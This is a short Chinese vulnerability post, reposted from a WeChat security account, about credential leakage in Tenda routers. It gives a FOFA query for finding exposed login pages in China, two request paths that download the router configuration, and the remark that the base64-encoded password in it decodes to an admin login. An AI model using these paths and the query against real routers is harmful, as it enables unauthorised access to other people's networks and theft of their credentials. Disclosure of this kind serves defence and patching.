免责声明
请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、简介
Tenda是一家中国的网络设备制造商,成立于1999年,专注于提供各种网络产品,包括路由器、交换机、无线接入点和网络适配器等。Tenda路由器以其高性价比、易于设置和良好的用户体验而受到消费者的欢迎。
二、漏洞描述
Tenda路由器 /cgi-bin/DownloadCfg接口处存在信息泄露漏洞,攻击者可通过此漏洞获取路由器后台账号密码。
三、fofa语法
title="Tenda | LOGIN" && country="CN"
四、漏洞复现
/cgi-bin/DownloadCfg.jpg
/cgi-bin/DownloadCfg/RouterCfm.jpg
密码通过base64解密即可登录成功
批量检测:
五、修复建议
及时更新,禁止访问或删除!!!
网安交流群
原文始发于微信公众号(白帽攻防):Tenda路由器账号密码信息泄露漏洞
标签:bin,cgi,Tenda,DownloadCfg,漏洞,账号密码,路由器 From: https://blog.csdn.net/m0_46381222/article/details/143284041